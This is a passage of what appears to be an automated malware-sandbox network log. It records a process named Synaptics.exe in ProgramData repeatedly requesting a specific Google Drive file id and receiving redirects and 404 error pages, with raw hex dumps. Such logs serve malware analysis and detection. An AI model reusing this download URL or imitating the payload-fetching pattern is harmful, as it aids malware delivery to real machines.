                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    20192.168.2.449770142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:06 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:06 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:06 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-b-JOeFkV2gSHDen25dtBpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    21192.168.2.449772142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:07 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:07 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:07 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-AFwJveV16ldUrRXpI_bDhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    22192.168.2.449773142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:07 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:07 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4iRC7a176RbOnaVsoRVPnlIBPwCSrLTRXCH6khei1WV6jOBASbiRTFBA7Fy6h2IqjSYxh8Z94
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:07 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-09iRPO4ZN4K3ceYIt8wz9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:07 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:51:07 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 50 32 41 71 72 51 71 2d 38 6c 67 79 44 5f 5a 36 4a 48 77 61 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="5P2AqrQq-8lgyD_Z6JHwaw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:51:07 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    23192.168.2.449771142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:07 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:07 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC6yC7F82ZOsHlSknNnULOntTIJxDL73T9tEi7uxi1bfLY17BpuQ_kGX_3MkSuaW4wO6S2LFLXc
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:07 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CIgWd-EaZoqUqcPSee4zCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:07 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:51:07 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 41 4b 51 4a 32 42 4e 68 7a 37 5f 6f 71 6a 42 59 73 6e 41 46 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="oAKQJ2BNhz7_oqjBYsnAFg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:51:07 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    24192.168.2.449774142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:07 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:07 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:07 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CdsT7K3fsx1L89ZRPkZ2zQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    25192.168.2.449778142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:08 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:08 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Coz9Ky4GKYsjp5Pa_xP75w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    26192.168.2.449779142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:08 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:08 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-qGpjlJYLGZ2Wn-xddQy6_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    27192.168.2.449780142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:08 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:08 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5wEnMbzKEtepjyjLg6pygOFK6Szddp_MLcR8cl3bBMyGXSHCrZ8gZM59WgzdWPPkX20dojiwE
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:08 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DEym99Z-dyPpLM29TlMTtQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:08 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
